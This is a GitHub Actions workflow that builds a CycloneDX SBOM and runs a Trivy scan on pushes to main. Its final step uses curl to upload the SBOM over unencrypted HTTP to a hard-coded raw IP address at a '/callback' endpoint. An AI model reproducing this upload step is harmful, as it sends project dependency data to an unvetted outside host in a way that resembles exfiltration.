name: Trivy SBOM Validation

on:
  push:
    branches:
      - main

jobs:
  sbom:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout Code
        uses: actions/checkout@v3

      - name: Install CycloneDX
        run: npm install -g @cyclonedx/bom

      - name: Install Trivy
        run: sudo apt-get install -y trivy

      - name: Generate SBOM
        run: cyclonedx-bom -o sbom.json

      - name: Run Trivy Scan
        run: trivy fs . --format json --output trivy-report.json

      - name: Submit SBOM
        run: |
          curl -X POST -H "Content-Type: multipart/form-data" -F "file=@sbom.json" http://35.219.139.110:8880/callback
